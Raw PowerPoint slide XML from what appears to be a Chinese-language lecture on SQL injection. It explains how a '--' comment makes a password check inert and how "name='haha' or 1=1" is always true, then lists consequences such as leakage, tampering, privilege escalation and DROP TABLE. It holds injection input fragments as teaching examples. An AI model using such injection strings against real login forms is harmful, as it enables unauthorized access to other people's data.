              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>最终</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="■"/>
            </a:pPr>
            <a:endParaRPr sz="900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="17145" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>符号是注释符号，其后的内容均为注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>释</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，即命令</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>符号后的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>'and  password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>'123456'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>均为注</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>释</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，那</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>么</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的值在查询时也根本起不了任何作 用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>后的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>name=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>'haha'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>这条语句永远为真</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>所以最终执行</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语 句相当</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>于</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="1D070B"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1170051" y="1828800"/>
            <a:ext cx="3230117" cy="208025"/>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137297" y="2103120"/>
            <a:ext cx="3448812" cy="124205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452765" y="2730245"/>
            <a:ext cx="3133344" cy="332994"/>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20765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3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748931" y="408305"/>
            <a:ext cx="172720" cy="2465070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="172719"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96229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5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4444631" y="43345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308487" y="621993"/>
            <a:ext cx="124968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SQ</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入的后果</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="863031"/>
            <a:ext cx="1327150" cy="1697989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="22860" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="180"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>信息泄漏</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>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10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SECLECT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="305"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>篡改数据</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>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10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>INSE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>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10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>UP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>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i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ALTER</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-100" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>USER</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>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5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ALERT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-85" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>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特权提升</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>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5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>EXEC</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="310"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>破坏系统</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>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10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>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5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
